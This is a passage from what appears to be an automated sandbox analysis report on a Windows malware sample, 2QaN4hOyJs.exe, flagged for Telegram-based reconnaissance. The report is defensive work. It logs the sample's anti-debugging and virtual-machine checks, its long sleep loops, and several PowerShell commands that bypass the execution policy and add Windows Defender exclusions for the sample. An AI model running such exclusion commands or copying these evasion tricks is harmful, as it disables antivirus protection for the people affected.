                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584Thread sleep count: 6010 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584Thread sleep count: 3727 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep time: -3689348814741908s >= -30000s
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599886Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599766Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599656Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599541Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599406Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599296Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599176Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599003Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598860Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598703Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598594Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598457Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598328Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598219Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598109Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597985Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597860Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597735Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597610Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597485Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597360Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597235Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597110Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596985Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596860Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596735Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596619Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596500Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596374Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596240Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596106Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595984Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595873Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595766Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595641Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595531Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595422Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595313Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595203Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595094Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594969Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594859Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594750Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594641Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594531Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594422Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594313Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594188Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594078Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 593969Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 593844Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 593735Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: 2QaN4hOyJs.exe, 00000000.00000002.2619342449.000000001C034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
                                    Source: System.0.drBinary or memory string: vmware
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    barindex
                                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeCode function: 0_2_00007FF887D125E3 CheckRemoteDebuggerPresent,0_2_00007FF887D125E3
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe'
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System'
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System'Jump to behavior
                                    Bypasses PowerShell execution policy
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe'
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2QaN4hOyJs.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System'Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System'Jump to behavior

                                    Language, Device and Operating System Detection

                                    barindex
                                    Yara detected Telegram Recon
                                    Source: Yara matchFile source: 2QaN4hOyJs.exe, type: SAMPLE
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeQueries volume information: C:\Users\user\Desktop\2QaN4hOyJs.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
